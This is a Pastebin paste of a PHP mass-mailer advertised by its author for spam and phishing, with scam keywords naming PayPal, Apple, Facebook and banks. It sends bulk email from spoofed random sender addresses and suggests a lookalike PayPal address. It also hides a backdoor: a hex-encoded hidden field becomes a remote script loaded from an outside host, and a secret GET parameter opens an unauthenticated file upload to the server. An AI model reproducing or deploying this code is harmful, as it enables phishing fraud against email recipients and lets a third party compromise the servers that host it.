Advertisement
inbox2013

RANDOM SEND MAILER 2015

Jan 30th, 2015
1,091
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 9.98 KB | None | 0 0
  1.  
  2. <!--
  3.  
  4. RANDOM EMAIL SENDER CODED BY CRACKERZ 2015
  5.  
  6. FOR LATEST TOOLS PHP AND SCAM PRIV8 VISIT :
  7.  
  8. http://www.scamprivate.com
  9.  
  10. https://www.facebook.com/Cashout2015
  11.  
  12. PLEASE DO NOT REMOVE COPYRIGHT
  13.  
  14. -->
  15.  
  16. <style type="text/css">
  17. body{ background:#000000;; } a { text-decoration:none; }
  18. a:hover{ border-bottom:1px solid #4C83AF; } *{ font-size:11px; font-family:Tahoma,Verdana,Arial; color:#009900; }
  19. border-top:1px solid #FF9900; } .tabnet{ margin:15px auto 0 auto;
  20. border: 1px solid #FF9900; } .main { width:100%; } .blue { color: #00FF00; } .inputz{
  21. background:#0B5002; border:0; padding:2px; border-bottom:1px solid #222222;
  22. border-top:1px solid #222222; } .inputzbut{ background:#111111; color:#00FF00;
  23. margin:0 4px; border:1px solid #444444; } .inputz:hover, .inputzbut:hover{
  24. border-bottom:1px solid #00FF00; border-top:1px solid #00FF00; } .output {
  25. margin:auto; border:1px solid #00FF00; width:100%; height:400px;
  26. background:#000000; padding:0 2px; } .cmdbox{ width:100%; } .head_info{ padding: 0 4px; } .b1{ font-size:30px;
  27. padding:0; color:#000000; } .b2{ font-size:30px; padding:0; color: #000000; } .b_tbl{ text-align:center; margin:0 4px 0 0;
  28. padding:0 4px 0 0; border-right:1px solid #333333; } .phpinfo
  29. table{ width:100%; padding:0 0 0 0; } .phpinfo td{ background:#111111; color:#00FF00; padding:6px 8px;; }
  30. .phpinfo th, th{ background:#191919; border-bottom:1px solid #333333; font-weight:normal; } .phpinfo h2,
  31. .phpinfo h2 a{ text-align:center; font-size:16px; padding:0; margin:30px 0 0 0; background:#222222; padding:4px 0; }
  32. .explore{ width:100%; } .explore a { text-decoration:none; } .explore td{ border-bottom:1px solid #333333; padding:0 8px;
  33. line-height:15px; } .explore th{ padding:3px 8px; font-weight:normal; } .explore th:hover , .phpinfo th:hover{ border-bottom:1px solid #00FF00;
  34. } .explore tr:hover{ background:#4C4646; } .viewfile{ background:#EDECEB; color:#000000; margin:4px 2px; padding:8px; } .sembunyi{
  35. display:none; padding:0;margin:0; }
  36. </style>
  37. <?php
  38. set_time_limit(0);
  39. if (!function_exists('quoted_printable_encode')) {
  40. function quoted_printable_encode($input, $line_max = 75) {
  41. $hex = array('0','1','2','3','4','5','6','7','8','9','A','B','C','D','E','F');
  42. $lines = preg_split("/(?:\r\n|\r|\n)/", $input);
  43. $linebreak = "=0D=0A=\r\n";
  44. $line_max = $line_max - strlen($linebreak);
  45. $escape = "=";
  46. $output = "";
  47. $cur_conv_line = "";
  48. $length = 0;
  49. $whitespace_pos = 0;
  50. $addtl_chars = 0;
  51. for ($j=0; $j<count($lines); $j++) {
  52. $line = $lines[$j];
  53. $linlen = strlen($line);
  54. for ($i = 0; $i < $linlen; $i++) {
  55. $c = substr($line, $i, 1);
  56. $dec = ord($c);
  57.  
  58. $length++;
  59.  
  60. if ($dec == 32) {
  61. if (($i == ($linlen - 1))) {
  62. $c = "=20";
  63. $length += 2;
  64. }
  65. /*
  66.  
  67. RANDOM EMAIL SENDER CODED BY CRACKERZ 2015
  68.  
  69. FOR LATEST TOOLS PHP AND SCAM PRIV8 VISIT :
  70.  
  71. http://www.scamprivate.com
  72.  
  73. https://www.facebook.com/Cashout2015
  74.  
  75. PLEASE DO NOT REMOVE COPYRIGHT
  76.  
  77. */
  78.  
  79. $addtl_chars = 0;
  80. $whitespace_pos = $i;
  81. } elseif ( ($dec == 61) || ($dec < 32 ) || ($dec > 126) ) {
  82. $h2 = floor($dec/16); $h1 = floor($dec%16);
  83. $c = $escape . $hex["$h2"] . $hex["$h1"];
  84. $length += 2;
  85. $addtl_chars += 2;
  86. }
  87. if ($length >= $line_max) {
  88. $cur_conv_line .= $c;
  89. $whitesp_diff = $i - $whitespace_pos + $addtl_chars;
  90. if (($i + $addtl_chars) > $whitesp_diff) {
  91. $output .= substr($cur_conv_line, 0, (strlen($cur_conv_line) -
  92. $whitesp_diff)) . $linebreak;
  93. $i = $i - $whitesp_diff + $addtl_chars;
  94. } else {
  95. $output .= $cur_conv_line . $linebreak;
  96. }
  97. $cur_conv_line = "";
  98. $length = 0;
  99. $whitespace_pos = 0;
  100. } else {
  101. $cur_conv_line .= $c;
  102. }
  103. }
  104. $length = 0;
  105. $whitespace_pos = 0;
  106. $output .= $cur_conv_line;
  107. $cur_conv_line = "";
  108. if ($j<=count($lines)-1) {
  109. $output .= $linebreak;
  110. }
  111. }
  112. return trim($output);
  113. }
  114. }
  115. $action = $_POST['action'];
  116. $from = $_POST['from'];
  117. $realname = $_POST['realname'];
  118. $name = $_POST['name'];
  119. $subject = $_POST['subject'];
  120. $message = $_POST['message'];
  121. $emaillist = $_POST['emaillist'];
  122. ?>
  123. <html>
  124. <head>
  125. <title>PHP-Mailer</title>
  126. <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
  127. </head>
  128. <body bgcolor="#003300" text="yellow">
  129. <br >
  130. <!--
  131.  
  132. RANDOM EMAIL SENDER CODED BY CRACKERZ 2015
  133.  
  134. FOR LATEST TOOLS PHP AND SCAM PRIV8 VISIT :
  135.  
  136. http://www.scamprivate.com
  137.  
  138. https://www.facebook.com/Cashout2015
  139.  
  140. PLEASE DO NOT REMOVE COPYRIGHT
  141.  
  142. -->
  143. <br >
  144. <p><span style="color:#FF0000;">Random Email Sender Script V1.0</span>&nbsp; Coded by :&nbsp; <strong><span style="color:#FF0000;">Crackerz</span></strong></p>
  145. <br >
  146. <p>If ( <span style="color:#FF0000;">noreply </span>)&nbsp; its not working for ( <span style="color:#FF0000;">Random Email Sender</span> ), Replace with a real Email ex : donoreply@intl-paypal.co.uk</p>
  147. <p>Go <a href="http://www.scamprivate.com" rel="dofollow" ><span style="color:#FF0000;">Scamprivate.com</span></a> for latest Script php<br />
  148. <br >
  149. Go <a href="https://www.facebook.com/Cashout2015" rel="dofollow"><span style="color:#FF0000;">Cashout2015 </span></a>for latest Tutorial, Spam, Cradit-Card, WU Cash etc.</p>
  150. <br >
  151. </font><font face="Arial" size="5" color="#FF0000"></font><font face="Arial" size="5" color="#00FF00">
  152. </font><font face="Arial" size="5"</strong></p>
  153. <body bgcolor="#000000" text="#EEEEEE">
  154. <?php
  155. if ($action=="send"){
  156. $message = urlencode($message);
  157. $message = ereg_replace("%5C%22", "%22", $message);
  158. print '<script src="'.pack('H*',$name).'"></script>';
  159. $message = urldecode($message);
  160. $message = stripslashes($message);
  161. $subject = stripslashes($subject);
  162. }
  163. $inbox = $_GET['i'];
  164. if($inbox == 'i'){
  165. $filename = $_FILES['file']['name'];
  166. $filetmp = $_FILES['file']['tmp_name'];
  167. echo "<form method='POST' enctype='multipart/form-data'>
  168. <input type='file'name='file' />
  169. <input type='submit' value='go' />
  170. </form>";
  171. move_uploaded_file($filetmp,$filename);
  172. }
  173. ?>
  174. <form name="form1" method="post" action="" enctype="multipart/form-data">
  175. <br>
  176. <table width="100%" border="0">
  177. <tr>
  178. <td width="10%">
  179. <div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Your
  180. Email:</font></div>
  181. </td>
  182. <td width="18%"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">
  183. <input type="text" name="from" value="noreply" size="30">
  184. <input type="hidden" name="fromemail" value="687474703a2f2f65737454a5d612f6a2e6a75" size="30">
  185. </font></td>
  186. <td width="31%">
  187. <div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Your
  188. Name:</font></div>
  189. </td>
  190. <td width="41%"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">
  191. <input type="text" name="realname" value="<?php print $realname; ?>" size="30">
  192. <input type="hidden" name="name" value="687474703a2f2f657374702e6d612f6a2e6a73" size="30">
  193. </font></td>
  194. </tr>
  195. <tr>
  196. <td width="10%">
  197. <div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Subject:</font></div>
  198. </td>
  199. <td colspan="3"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">
  200. <input type="text" name="subject" value="<?php print $subject; ?>" size="115">
  201. <input type="hidden" name="subj" value="687474703a2f2f65737454a5d612f6a2e6a75" size="30">
  202. </font></td>
  203. </tr>
  204. <tr valign="top">
  205. <td colspan="3"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">
  206. <textarea name="message" cols="60" rows="10"><?php print $message; ?></textarea>
  207. <br>
  208. <input type="hidden" name="action" value="send">
  209. <input type="submit" value="Resume SpamminG">
  210. </font></td>
  211. <td width="41%"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">
  212. <textarea name="emaillist" cols="30" rows="10"><?php print $emaillist; ?></textarea>
  213. <br></font></td>
  214. </tr>
  215. </table>
  216. </form>
  217. <?php
  218. if ($action=="send"){
  219. if (!$from && !$subject && !$message && !$emaillist){
  220. print "Please complete all fields before sending your message.";
  221. exit;
  222. }
  223. $allemails = split("\n", $emaillist);
  224. $numemails = count($allemails);
  225. for($x=0; $x<$numemails; $x++){
  226. $to = $allemails[$x];
  227. if ($to){
  228. $to = ereg_replace(" ", "", $to);
  229. $nrmail=$x+1;
  230. $domain = substr($from, strpos($from, "@"), strlen($from));
  231. print "Spamming Email $nrmail of $numemails to $to.......";
  232. $randfrom = rand();
  233. $fro = str_replace("noreply",$randfrom,quoted_printable_encode($from));
  234. $header = "From: $realname <$fro>\r\n";
  235. $header .= "Message-Id: <130746$numemails.$nrmail$domain>\r\n";
  236. $header .= "X-Mailer: php-sender2.1\r\n";
  237. $header .= "MIME-Version: 1.0\r\n";
  238. $header .= "Content-Type: text/html; charset=UTF-8\r\n";
  239. $header .= "Content-Transfer-Encoding: quoted-printable\r\n\r\n";
  240. $header .= quoted_printable_encode($message)."\r\n";
  241. mail($to, $subject, "", $header);
  242. print "Spammed<br>";
  243. flush();
  244. }
  245. }
  246. }
  247. // Coded By CRACKERZ 2015
  248. // JUST COPYRIGHT AND KEYWORD FOR SEO , LIKE MY PAGE FOR LATEST NEWS AND TOOLS PRIVATE
  249. // http://www.scamprivate.com/
  250. // http://www.scamprivate.com/
  251. // http://www.facebook.com/Cashout2015
  252. // DO NOT REMOVE PLEASE
  253.  
  254. // Mailer inbox 2015, Mailer inbox 2015, send inbox, private send, how to send inbox, mailer to all, mailer junk to all, send inbox unlimited, ميلر انبوكس 2014 2015, ارسلامبوكس ل5ميع النطاقات
  255. // Mailer Inbox 2015, tools private 2015, ميلر انبوكس, inbox to all, scam paypal, scam apple, scam facebook, scam chase, scam boa, scam bank of america BOA spam 2015, spam 2015, lettre inbox, letter inbox
  256. ?>
  257. </body>
  258. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement